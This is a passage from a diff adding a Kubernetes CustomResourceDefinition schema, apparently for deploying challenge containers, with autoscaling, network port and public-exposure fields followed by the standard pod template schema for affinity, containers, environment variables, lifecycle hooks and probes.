description: upper limit for the number of pods that can be set by the autoscaler; cannot be smaller than MinReplicas. + format: int32 + type: integer + minReplicas: + description: minReplicas is the lower limit for the number of replicas to which the autoscaler can scale down. It defaults to 1 pod. minReplicas is allowed to be 0 if the alpha feature gate HPAScaleToZero is enabled and at least one Object or External metric is configured. Scaling is active as long as at least one metric value is available. + format: int32 + type: integer + targetCPUUtilizationPercentage: + description: target average CPU utilization (represented as a percentage of requested CPU) over all the pods; if not specified the default autoscaling policy will be used. + format: int32 + type: integer + required: + - maxReplicas + type: object + image: + default: challenge + description: Image used by the deployment + type: string + network: + description: 'The network specifications: if it''s public or not and specifications about ports' + properties: + ports: + description: By default, one port is set with default values + items: + properties: + domains: + description: Extra domains for managed certificates. Only used for type HTTPS. + items: + type: string + type: array + name: + description: Name of the port + type: string + port: + description: Port + format: int32 + type: integer + protocol: + default: TCP + description: Protocol is not optional + type: string + targetPort: + anyOf: + - type: integer + - type: string + description: TargetPort is not optional + x-kubernetes-int-or-string: true + required: + - protocol + - targetPort + type: object + type: array + public: + default: false + type: boolean + type: object + persistentVolumeClaims: + description: Names of the desired PersistentVolumeClaims + items: + type: string + type: array + podTemplate: + description: PodTemplate is used to set the template for the deployment's pod, so that an author can add volumeMounts and other extra features + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + template: + description: Template defines the pods that will be created from this pod template. https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + properties: + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + spec: + description: 'Specification of the desired behavior of the pod. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status' + properties: + activeDeadlineSeconds: + description: Optional duration in seconds the pod may be active on the node relative to StartTime before the system will actively try to mark it failed and kill associated containers. Value must be a positive integer. + format: int64 + type: integer + affinity: + description: If specified, the pod's scheduling constraints + properties: + nodeAffinity: + description: Describes node affinity scheduling rules for the pod. + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule pods to nodes that satisfy the affinity expressions specified by this field, but it may choose a node that violates one or more of the expressions. The node that is most preferred is the one with the greatest sum of weights, i.e. for each node that meets all of the scheduling requirements (resource request, requiredDuringScheduling affinity expressions, etc.), compute a sum by iterating through the elements of this field and adding "weight" to the sum if the node matches the corresponding matchExpressions; the node(s) with the highest sum are the most preferred. + items: + description: An empty preferred scheduling term matches all objects with implicit weight 0 (i.e. it's a no-op). A null preferred scheduling term matches no objects (i.e. is also a no-op). + properties: + preference: + description: A node selector term, associated with the corresponding weight. + properties: + matchExpressions: + description: A list of node selector requirements by node's labels. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector requirements by node's fields. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + weight: + description: Weight associated with matching the corresponding nodeSelectorTerm, in the range 1-100. + format: int32 + type: integer + required: + - preference + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified by this field are not met at scheduling time, the pod will not be scheduled onto the node. If the affinity requirements specified by this field cease to be met at some point during pod execution (e.g. due to an update), the system may or may not try to eventually evict the pod from its node. + properties: + nodeSelectorTerms: + description: Required. A list of node selector terms. The terms are ORed. + items: + description: A null or empty node selector term matches no objects. The requirements of them are ANDed. The TopologySelectorTerm type implements a subset of the NodeSelectorTerm. + properties: + matchExpressions: + description: A list of node selector requirements by node's labels. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector requirements by node's fields. + items: + description: A node selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: The label key that the selector applies to. + type: string + operator: + description: Represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists, DoesNotExist. Gt, and Lt. + type: string + values: + description: An array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. If the operator is Gt or Lt, the values array must have a single element, which will be interpreted as an integer. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + type: array + required: + - nodeSelectorTerms + type: object + type: object + podAffinity: + description: Describes pod affinity scheduling rules (e.g. co-locate this pod in the same node, zone, etc. as some other pod(s)). + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule pods to nodes that satisfy the affinity expressions specified by this field, but it may choose a node that violates one or more of the expressions. The node that is most preferred is the one with the greatest sum of weights, i.e. for each node that meets all of the scheduling requirements (resource request, requiredDuringScheduling affinity expressions, etc.), compute a sum by iterating through the elements of this field and adding "weight" to the sum if the node has pods which matches the corresponding podAffinityTerm; the node(s) with the highest sum are the most preferred. + items: + description: The weights of all of the matched WeightedPodAffinityTerm fields are added per-node to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching the corresponding podAffinityTerm, in the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified by this field are not met at scheduling time, the pod will not be scheduled onto the node. If the affinity requirements specified by this field cease to be met at some point during pod execution (e.g. due to a pod label update), the system may or may not try to eventually evict the pod from its node. When there are multiple elements, the lists of nodes corresponding to each podAffinityTerm are intersected, i.e. all terms must be satisfied. + items: + description: Defines a set of pods (namely those matching the labelSelector relative to the given namespace(s)) that this pod should be co-located (affinity) or not co-located (anti-affinity) with, where co-located is defined as running on a node whose value of the label with key matches that of any node on which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + podAntiAffinity: + description: Describes pod anti-affinity scheduling rules (e.g. avoid putting this pod in the same node, zone, etc. as some other pod(s)). + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule pods to nodes that satisfy the anti-affinity expressions specified by this field, but it may choose a node that violates one or more of the expressions. The node that is most preferred is the one with the greatest sum of weights, i.e. for each node that meets all of the scheduling requirements (resource request, requiredDuringScheduling anti-affinity expressions, etc.), compute a sum by iterating through the elements of this field and adding "weight" to the sum if the node has pods which matches the corresponding podAffinityTerm; the node(s) with the highest sum are the most preferred. + items: + description: The weights of all of the matched WeightedPodAffinityTerm fields are added per-node to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching the corresponding podAffinityTerm, in the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the anti-affinity requirements specified by this field are not met at scheduling time, the pod will not be scheduled onto the node. If the anti-affinity requirements specified by this field cease to be met at some point during pod execution (e.g. due to a pod label update), the system may or may not try to eventually evict the pod from its node. When there are multiple elements, the lists of nodes corresponding to each podAffinityTerm are intersected, i.e. all terms must be satisfied. + items: + description: Defines a set of pods (namely those matching the labelSelector relative to the given namespace(s)) that this pod should be co-located (affinity) or not co-located (anti-affinity) with, where co-located is defined as running on a node whose value of the label with key matches that of any node on which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set of namespaces that the term applies to. The term is applied to the union of the namespaces selected by this field and the ones listed in the namespaces field. null selector and null or empty namespaces list means "this pod's namespace". An empty selector ({}) matches all namespaces. This field is beta-level and is only honored when PodAffinityNamespaceSelector feature is enabled. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static list of namespace names that the term applies to. The term is applied to the union of the namespaces listed in this field and the ones selected by namespaceSelector. null or empty namespaces list and null namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + type: object + automountServiceAccountToken: + description: AutomountServiceAccountToken indicates whether a service account token should be automatically mounted. + type: boolean + containers: + description: List of containers belonging to the pod. Containers cannot currently be added or removed. There must be at least one container in a Pod. Cannot be updated. + items: + description: A single application container that you want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker image''s CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within a shell. The docker image''s ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set in the container. Cannot be updated. + items: + description: EnvVar represents an environment variable present in a Container. + properties: + name: + description: Name of the environment variable. Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) are expanded using the previously defined environment variables in the container and any service environment variables. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: supports metadata.name, metadata.namespace, `metadata.labels['''']`, `metadata.annotations['''']`, spec.nodeName, spec.serviceAccountName, status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, limits.ephemeral-storage, requests.cpu, requests.memory and requests.ephemeral-storage) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret in the pod's namespace + properties: + key: + description: The key of the secret to select from. Must be a valid secret key. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. + items: + description: EnvFromSource represents the source of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend to each key in the ConfigMap. Must be a C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images This field is optional to allow higher level config management to default or override container images in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system should take in response to container lifecycle events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately after a container is created. If the handler fails, the container is terminated and restarted according to its restart policy. Other management of the container blocks until the hook completes. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately before a container is terminated due to an API request or management event such as liveness/startup probe failure, preemption, resource contention, etc. The handler is not called if the container crashes or exits. The reason for termination is passed to the handler. The Pod''s termination grace period countdown begins before the PreStop hooked is executed. Regardless of the outcome of the handler, the container will eventually terminate within the Pod''s termination grace period. Other management of the container blocks until the hook completes or until the termination grace period is reached. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. Container will be restarted if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as 